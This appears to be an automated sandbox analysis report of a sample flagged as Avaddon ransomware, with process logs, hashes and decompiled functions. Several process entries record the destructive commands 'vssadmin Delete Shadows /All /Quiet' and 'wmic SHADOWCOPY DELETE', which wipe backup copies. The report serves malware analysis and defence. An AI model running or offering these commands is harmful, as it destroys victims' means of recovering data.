File size:	110592 bytes
MD5 hash:	7E30B94672107D3381A1D175CF18C147
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 7204 Parent PID: 5468

General

Start time:	16:47:39
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 7444 Parent PID: 6212

General

Start time:	16:47:40
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic SHADOWCOPY DELETE /nointeractive
Imagebase:	0x950000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7496 Parent PID: 7444

General

Start time:	16:47:41
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vssadmin.exe PID: 7608 Parent PID: 6212

General

Start time:	16:47:42
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\vssadmin.exe
Wow64 process (32bit):	true
Commandline:	vssadmin Delete Shadows /All /Quiet
Imagebase:	0x13b0000
File size:	110592 bytes
MD5 hash:	7E30B94672107D3381A1D175CF18C147
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7616 Parent PID: 7608

General

Start time:	16:47:42
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 7676 Parent PID: 6212

General

Start time:	16:47:43
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic SHADOWCOPY DELETE /nointeractive
Imagebase:	0x950000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7684 Parent PID: 7676

General

Start time:	16:47:44
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: vssadmin.exe PID: 7752 Parent PID: 6212

General

Start time:	16:47:45
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\vssadmin.exe
Wow64 process (32bit):	true
Commandline:	vssadmin Delete Shadows /All /Quiet
Imagebase:	0x13b0000
File size:	110592 bytes
MD5 hash:	7E30B94672107D3381A1D175CF18C147
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7788 Parent PID: 7752

General

Start time:	16:47:46
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: ab.exe PID: 1864 Parent PID: 664

General

Start time:	16:48:34
Start date:	06/01/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
Imagebase:	0x12f0000
File size:	794112 bytes
MD5 hash:	0B486FE0503524CFE4726A4022FA6A68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000023.00000002.438770513.0000000001537000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ab.exe PID: 4876 Parent PID: 664 ab.exeCOMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.3%
Total number of Nodes:	1459
Total number of Limit Nodes:	11

Executed Functions

Function 0135E284, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0135E284(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t129;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_t85 = _a4;
				_push(__edi);
				_t33 = E013559E0(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E0135E217(0x137d550, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E0135DB88(_t92); // executed
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E0135DCA8();
					} else {
						E0135DC0F(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E0135E217(0x137d240, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E0135DCA8();
							} else {
								E0135DC0F(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E0135E0D4(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x2
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // -1
							_t47 = E0135555C(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E013496E7();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0x13a4018; // 0x39cca9f6
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E013559E0(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E013559E0(_t98, _t115) + 0x34c);
								_t128 = E0135E9BF(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E0135B52B(_t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E0135EAF1(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								_pop(_t129);
								return E0132EA79(_v12 ^ _t131, _t129);
							} else {
								if(E0135628F(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E0135628F(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E01365367(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E0135628F(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E01365367(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E01363434(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E0135555C(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0135e289
0x0135e28a
0x0135e28c
0x0135e290
0x0135e291
0x0135e298
0x0135e29a
0x0135e29d
0x0135e29d
0x0135e2a0
0x0135e2a0
0x0135e2a6
0x0135e2a9
0x0135e2ac
0x0135e2ac
0x0135e2af
0x0135e2b2
0x0135e2b4
0x0135e2ba
0x0135e2bc
0x0135e2c1
0x0135e2cb
0x0135e2d0
0x0135e2d2
0x0135e2d5
0x0135e2d5
0x0135e2d7
0x0135e2db
0x0135e324
0x00000000
0x0135e2dd
0x0135e2e2
0x0135e2eb
0x0135e2e4
0x0135e2e4
0x0135e2e4
0x0135e2f6
0x0135e300
0x0135e305
0x0135e30a
0x0135e310
0x0135e314
0x0135e31d
0x0135e316
0x0135e316
0x0135e316
0x0135e329
0x0135e329
0x0135e30a
0x0135e2f6
0x0135e32f
0x0135e46b
0x0135e46b
0x00000000
0x0135e335
0x0135e335
0x0135e33e
0x0135e34f
0x0135e345
0x0135e345
0x0135e345
0x0135e356
0x0135e35a
0x00000000
0x0135e37e
0x0135e37e
0x0135e383
0x0135e385
0x0135e385
0x0135e387
0x0135e38c
0x0135e466
0x0135e468
0x0135e46d
0x0135e471
0x0135e392
0x0135e392
0x0135e395
0x0135e395
0x0135e39d
0x0135e3a0
0x0135e3a0
0x0135e3a3
0x0135e3a3
0x0135e3a6
0x0135e3a9
0x0135e3b3
0x0135e3bd
0x0135e3c2
0x0135e3c7
0x0135e472
0x0135e474
0x0135e475
0x0135e476
0x0135e477
0x0135e478
0x0135e479
0x0135e47e
0x0135e482
0x0135e48a
0x0135e491
0x0135e494
0x0135e495
0x0135e499
0x0135e49a
0x0135e49f
0x0135e4a7
0x0135e4b6
0x0135e4c2
0x0135e4d3
0x0135e4db
0x0135e4f5
0x0135e502
0x0135e505
0x0135e508
0x0135e508
0x0135e4dd
0x0135e4dd
0x0135e4df
0x0135e519
0x0135e523
0x0135e3cd
0x0135e3dd
0x00000000
0x0135e3e3
0x0135e3e5
0x0135e3e5
0x0135e3f1
0x0135e3ff
0x00000000
0x0135e401
0x0135e401
0x0135e404
0x0135e40a
0x0135e40d
0x0135e41d
0x0135e422
0x0135e430
0x00000000
0x00000000
0x00000000
0x00000000
0x0135e40f
0x0135e40f
0x0135e412
0x0135e418
0x0135e41b
0x0135e432
0x0135e432
0x0135e43e
0x0135e45e
0x00000000
0x0135e440
0x0135e440
0x0135e44a
0x0135e44f
0x0135e454
0x00000000
0x0135e456
0x00000000
0x0135e456
0x0135e454
0x00000000
0x00000000
0x00000000
0x0135e41b
0x0135e40d
0x0135e3ff
0x0135e3dd
0x0135e3c7
0x0135e38c
0x0135e35a

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

GetACP.KERNEL32(?,?,?,?,?,?,013540E9,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0135E345
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,013540E9,?,?,?,00000055,?,-00000050,?,?), ref: 0135E370
_wcschr.LIBVCRUNTIME ref: 0135E404
_wcschr.LIBVCRUNTIME ref: 0135E412
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0135E4D3

Strings

utf8, xrefs: 0135E442

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 3e2dfff00b3550ad24d6f5e9d5ddecd66e2d38702e9c3f8d8bf08d430e207a94
Instruction ID: 56142353c6c126541262ec5690fd862c043b29606fb448b4fdf1ae4c946e3d98
Opcode Fuzzy Hash: 3e2dfff00b3550ad24d6f5e9d5ddecd66e2d38702e9c3f8d8bf08d430e207a94
Instruction Fuzzy Hash: EB711771600206ABEB65AB7DCC41FBAB7A8EF54F48F544439EE05E7181FB74E6408790

Uniqueness

Uniqueness Score: -1.00%

Function 01304E30, Relevance: 7.9, Strings: 6, Instructions: 360
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E01304E30(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				char _v28;
				char _v32;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				char _v76;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v120;
				intOrPtr _v124;
				char _v128;
				char _v144;
				intOrPtr _v148;
				char _v152;
				char _v168;
				intOrPtr _v172;
				char _v176;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t161;
				void* _t171;
				char _t173;
				void* _t175;
				void* _t176;
				char _t178;
				char _t179;
				void* _t181;
				void* _t182;
				char _t184;
				intOrPtr _t185;
				void* _t187;
				void* _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t193;
				void* _t194;
				intOrPtr _t196;
				intOrPtr _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t205;
				intOrPtr _t207;
				void* _t218;
				intOrPtr* _t243;
				intOrPtr* _t246;
				void* _t273;
				intOrPtr _t274;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t282;
				intOrPtr _t285;
				intOrPtr _t288;
				intOrPtr _t291;
				void* _t294;
				signed int _t301;
				signed int _t303;
				intOrPtr* _t313;
				signed int _t315;
				void* _t316;
				intOrPtr* _t318;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t356;

				_t273 = __edx;
				_push(0xffffffff);
				_push(0x13666a0);
				_push( *[fs:0x0]);
				_push(_t294);
				_t161 =  *0x13a4018; // 0x39cca9f6
				_push(_t161 ^ _t315);
				 *[fs:0x0] =  &_v16;
				_t243 = __ecx;
				_v20 = __ecx;
				_v24 = __ecx;
				_push(2);
				_t318 = _t316 - 0x120;
				_v8 = 0;
				_t246 = _t318;
				 *_t246 = 0;
				 *((intOrPtr*)(_t246 + 4)) = 0;
				_t332 = _a8;
				if(_a8 != 0) {
					asm("lock inc dword [eax+0x4]");
				}
				 *_t246 = _a4;
				 *((intOrPtr*)(_t246 + 4)) = _a8;
				E01303AA0(_t243, _t273);
				_v8 = 1;
				 *_t243 = 0x13969c0;
				 *((intOrPtr*)(_t243 + 0x18)) = 0x248a;
				E01306180(_t243, _t273, _t294, _t332, _t243 + 0x1c); // executed
				_v8 = 2;
				 *((intOrPtr*)(_t243 + 0x34)) = 0x170;
				 *((intOrPtr*)(_t243 + 0x38)) = 0x3b;
				 *((intOrPtr*)(_t243 + 0x3c)) = 0xe;
				 *((intOrPtr*)(_t243 + 0x40)) = 0x11e;
				 *((intOrPtr*)(_t243 + 0x44)) = 0x15f;
				 *((intOrPtr*)(_t243 + 0x48)) = 0x63a;
				 *((intOrPtr*)(_t243 + 0x4c)) = 0;
				 *((intOrPtr*)(_t243 + 0x50)) = 0;
				 *((intOrPtr*)(_t243 + 0x54)) = 0;
				 *(_t243 + 0x58) = 0x40;
				 *((intOrPtr*)(_t243 + 0x5c)) = 0;
				_t295 =  *((intOrPtr*)(_t243 + 0x34));
				_t274 =  *0x139699c; // 0x1384458
				_t171 = E01304B00(_t243,  &_v48, _t274,  *((intOrPtr*)(_t243 + 0x34)),  *((intOrPtr*)(_t243 + 0x34)));
				_v8 = 3;
				E01304D70(_t243, _t243 + 0x60, _t171,  *((intOrPtr*)(_t243 + 0x34)), _t295,  *((intOrPtr*)(_t243 + 0x18)));
				_t319 = _t318 + 0xc;
				_v8 = 5;
				_t173 = _v28;
				if(_t173 >= 0x10) {
					_push(_t173 + 1);
					E012F56A0(_t243, _t295, _v48);
					_t319 = _t319 + 8;
				}
				_t296 =  *((intOrPtr*)(_t243 + 0x38));
				_t276 =  *0x13969ac; // 0x13845d0
				_v32 = 0;
				_v28 = 0xf;
				_v48 = 0;
				_t175 = E01304B00(_t243,  &_v96, _t276,  *((intOrPtr*)(_t243 + 0x38)),  *((intOrPtr*)(_t243 + 0x38)));
				_v8 = 6;
				_t176 = E01304D70(_t243,  &_v72, _t175,  *((intOrPtr*)(_t243 + 0x38)), _t296,  *((intOrPtr*)(_t243 + 0x18)));
				_v8 = 7;
				E01304BE0(_t243, _t243 + 0x78, _t176, _t296);
				_t321 = _t319 + 0xc;
				_t178 = _v52;
				if(_t178 >= 0x10) {
					_push(_t178 + 1);
					E012F56A0(_t243, _t296, _v72);
					_t321 = _t321 + 8;
				}
				_v56 = 0;
				_v52 = 0xf;
				_v72 = 0;
				_v8 = 0xa;
				_t179 = _v76;
				if(_t179 >= 0x10) {
					_push(_t179 + 1);
					E012F56A0(_t243, _t296, _v96);
					_t321 = _t321 + 8;
				}
				_t297 =  *((intOrPtr*)(_t243 + 0x3c));
				_t279 =  *0x1396990; // 0x1384dd8
				_v80 = 0;
				_v76 = 0xf;
				_v96 = 0;
				_t181 = E01304B00(_t243,  &_v144, _t279,  *((intOrPtr*)(_t243 + 0x3c)),  *((intOrPtr*)(_t243 + 0x3c)));
				_v8 = 0xb;
				_t182 = E01304D70(_t243,  &_v120, _t181,  *((intOrPtr*)(_t243 + 0x3c)), _t297,  *((intOrPtr*)(_t243 + 0x18)));
				_v8 = 0xc;
				E01304BE0(_t243, _t243 + 0x84, _t182, _t297);
				_t323 = _t321 + 0xc;
				_t184 = _v100;
				if(_t184 >= 0x10) {
					_push(_t184 + 1);
					E012F56A0(_t243, _t297, _v120);
					_t323 = _t323 + 8;
				}
				_v104 = 0;
				_v100 = 0xf;
				_v120 = 0;
				_v8 = 0xf;
				_t185 = _v124;
				if(_t185 >= 0x10) {
					_push(_t185 + 1);
					E012F56A0(_t243, _t297, _v144);
					_t323 = _t323 + 8;
				}
				_t298 =  *((intOrPtr*)(_t243 + 0x40));
				_t282 =  *0x13969a0; // 0x13855e0
				_v128 = 0;
				_v124 = 0xf;
				_v144 = 0;
				_t187 = E01304B00(_t243,  &_v192, _t282,  *((intOrPtr*)(_t243 + 0x40)),  *((intOrPtr*)(_t243 + 0x40)));
				_v8 = 0x10;
				_t188 = E01304D70(_t243,  &_v168, _t187,  *((intOrPtr*)(_t243 + 0x40)), _t298,  *((intOrPtr*)(_t243 + 0x18)));
				_v8 = 0x11;
				E01304BE0(_t243, _t243 + 0x90, _t188, _t298); // executed
				_t325 = _t323 + 0xc;
				_t190 = _v148;
				if(_t190 >= 0x10) {
					_push(_t190 + 1);
					E012F56A0(_t243, _t298, _v168);
					_t325 = _t325 + 8;
				}
				_v152 = 0;
				_v148 = 0xf;
				_v168 = 0;
				_v8 = 0x14;
				_t191 = _v172;
				if(_t191 >= 0x10) {
					_push(_t191 + 1);
					E012F56A0(_t243, _t298, _v192);
					_t325 = _t325 + 8;
				}
				_t299 =  *((intOrPtr*)(_t243 + 0x44));
				_t285 =  *0x13969a8; // 0x1385de8
				_v176 = 0;
				_v172 = 0xf;
				_v192 = 0;
				_t193 = E01304B00(_t243,  &_v240, _t285,  *((intOrPtr*)(_t243 + 0x44)),  *((intOrPtr*)(_t243 + 0x44)));
				_v8 = 0x15;
				_t194 = E01304D70(_t243,  &_v216, _t193,  *((intOrPtr*)(_t243 + 0x44)), _t299,  *((intOrPtr*)(_t243 + 0x18)));
				_v8 = 0x16;
				E01304BE0(_t243, _t243 + 0x9c, _t194, _t299);
				_t327 = _t325 + 0xc;
				_t196 = _v196;
				if(_t196 >= 0x10) {
					_push(_t196 + 1);
					E012F56A0(_t243, _t299, _v216);
					_t327 = _t327 + 8;
				}
				_v200 = 0;
				_v196 = 0xf;
				_v216 = 0;
				_v8 = 0x19;
				_t197 = _v220;
				if(_t197 >= 0x10) {
					_push(_t197 + 1);
					E012F56A0(_t243, _t299, _v240);
					_t327 = _t327 + 8;
				}
				_t300 =  *((intOrPtr*)(_t243 + 0x5c));
				_t288 =  *0x13969b4; // 0x1396090
				_v224 = 0;
				_v220 = 0xf;
				_v240 = 0;
				_t199 = E01304B00(_t243,  &_v288, _t288,  *((intOrPtr*)(_t243 + 0x5c)),  *((intOrPtr*)(_t243 + 0x5c)));
				_v8 = 0x1a;
				_t200 = E01304D70(_t243,  &_v264, _t199,  *((intOrPtr*)(_t243 + 0x5c)), _t300,  *((intOrPtr*)(_t243 + 0x18)));
				_v8 = 0x1b;
				E01304BE0(_t243, _t243 + 0xa8, _t200, _t300);
				_t329 = _t327 + 0xc;
				_t202 = _v244;
				if(_t202 >= 0x10) {
					_push(_t202 + 1);
					E012F56A0(_t243, _t300, _v264);
					_t329 = _t329 + 8;
				}
				_v248 = 0;
				_v244 = 0xf;
				_v264 = 0;
				_v8 = 0x1e;
				_t203 = _v268;
				if(_t203 >= 0x10) {
					_push(_t203 + 1);
					E012F56A0(_t243, _t300, _v288);
					_t329 = _t329 + 8;
				}
				_t301 =  *(_t243 + 0x58);
				_t291 =  *0x13969a4; // 0x13865f0
				_v272 = 0;
				_v268 = 0xf;
				_v288 = 0;
				_t205 = E01304B00(_t243,  &_v312, _t291, _t301,  *(_t243 + 0x58));
				_v8 = 0x1f;
				_t292 = _t205;
				E01304D70(_t243, _t243 + 0xb4, _t205, _t301, _t301,  *((intOrPtr*)(_t243 + 0x18)));
				_v8 = 0x21;
				_t207 = _v292;
				if(_t207 >= 0x10) {
					_t218 = _t207 + 1;
					_t356 = _t218;
					_push(_t218);
					E012F56A0(_t243, _t301, _v312);
				}
				_v296 = 0;
				_v292 = 0xf;
				_v312 = 0;
				 *((intOrPtr*)(_t243 + 0xcc)) = 0xa;
				 *((intOrPtr*)(_t243 + 0xd0)) = 0xa68;
				 *((intOrPtr*)(_t243 + 0xd4)) = 0xfeadbeef;
				 *((intOrPtr*)(_t243 + 0xd8)) = 1;
				 *((intOrPtr*)(_t243 + 0xdc)) = 0x28;
				 *((intOrPtr*)(_t243 + 0xe0)) = 1;
				 *((intOrPtr*)(_t243 + 0xe4)) = 0x64;
				 *((intOrPtr*)(_t243 + 0xe8)) = 0xa;
				 *((intOrPtr*)(_t243 + 0xec)) = 5;
				E013060B0(_t243, _t292, _t301, _t356, _t243 + 0xf0);
				_v8 = 0x22;
				E01305C80(_t243, _t243, _t292, _t301, _t356, _t243 + 0x108); // executed
				_v8 = 0x23;
				E01305700(_t243);
				_t313 = _a8;
				if(_t313 != 0) {
					_t303 = _t301 | 0xffffffff;
					asm("lock xadd [esi+0x4], eax");
					if(_t303 == 0) {
						 *((intOrPtr*)( *_t313))();
						asm("lock xadd [esi+0x8], edi");
						if(_t303 == 1) {
							 *((intOrPtr*)( *_t313 + 4))();
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t243;
			}

0x01304e30
0x01304e33
0x01304e35
0x01304e40
0x01304e49
0x01304e4a
0x01304e51
0x01304e55
0x01304e5b
0x01304e5d
0x01304e60
0x01304e63
0x01304e65
0x01304e68
0x01304e6f
0x01304e71
0x01304e77
0x01304e81
0x01304e83
0x01304e85
0x01304e85
0x01304e8c
0x01304e91
0x01304e96
0x01304e9b
0x01304ea2
0x01304ea9
0x01304eb0
0x01304eb5
0x01304ebc
0x01304ec3
0x01304eca
0x01304ed1
0x01304ed8
0x01304edf
0x01304ee6
0x01304eed
0x01304ef4
0x01304efb
0x01304f02
0x01304f0c
0x01304f12
0x01304f19
0x01304f23
0x01304f29
0x01304f2e
0x01304f31
0x01304f35
0x01304f3b
0x01304f3e
0x01304f42
0x01304f47
0x01304f47
0x01304f50
0x01304f56
0x01304f5d
0x01304f64
0x01304f6b
0x01304f6f
0x01304f78
0x01304f7f
0x01304f87
0x01304f90
0x01304f95
0x01304f98
0x01304f9e
0x01304fa1
0x01304fa5
0x01304faa
0x01304faa
0x01304fad
0x01304fb4
0x01304fbb
0x01304fbf
0x01304fc3
0x01304fc9
0x01304fcc
0x01304fd0
0x01304fd5
0x01304fd5
0x01304fe1
0x01304fe7
0x01304fee
0x01304ff5
0x01304ffc
0x01305000
0x01305009
0x01305010
0x01305018
0x01305024
0x01305029
0x0130502c
0x01305032
0x01305035
0x01305039
0x0130503e
0x0130503e
0x01305041
0x01305048
0x0130504f
0x01305053
0x01305057
0x0130505d
0x01305060
0x01305067
0x0130506c
0x0130506c
0x01305078
0x0130507e
0x01305085
0x0130508c
0x01305093
0x0130509a
0x013050a3
0x013050ad
0x013050b5
0x013050c1
0x013050c6
0x013050c9
0x013050d2
0x013050d5
0x013050dc
0x013050e1
0x013050e1
0x013050e4
0x013050ee
0x013050f8
0x013050ff
0x01305103
0x0130510c
0x0130510f
0x01305116
0x0130511b
0x0130511b
0x01305127
0x0130512d
0x01305134
0x0130513e
0x01305148
0x0130514f
0x01305158
0x01305162
0x0130516a
0x01305176
0x0130517b
0x0130517e
0x01305187
0x0130518a
0x01305191
0x01305196
0x01305196
0x01305199
0x013051a3
0x013051ad
0x013051b4
0x013051b8
0x013051c1
0x013051c4
0x013051cb
0x013051d0
0x013051d0
0x013051dc
0x013051e2
0x013051e9
0x013051f3
0x013051fd
0x01305204
0x0130520d
0x01305217
0x0130521f
0x0130522b
0x01305230
0x01305233
0x0130523c
0x0130523f
0x01305246
0x0130524b
0x0130524b
0x0130524e
0x01305258
0x01305262
0x01305269
0x0130526d
0x01305276
0x01305279
0x01305280
0x01305285
0x01305285
0x01305291
0x01305297
0x0130529e
0x013052a8
0x013052b2
0x013052b9
0x013052c6
0x013052ca
0x013052cc
0x013052d4
0x013052d8
0x013052e1
0x013052e3
0x013052e3
0x013052e4
0x013052eb
0x013052f0
0x013052f3
0x01305303
0x0130530d
0x01305314
0x0130531e
0x01305328
0x01305332
0x0130533c
0x01305346
0x01305350
0x0130535a
0x01305365
0x0130536f
0x0130537a
0x01305381
0x01305388
0x0130538c
0x01305391
0x01305396
0x01305398
0x0130539d
0x013053a2
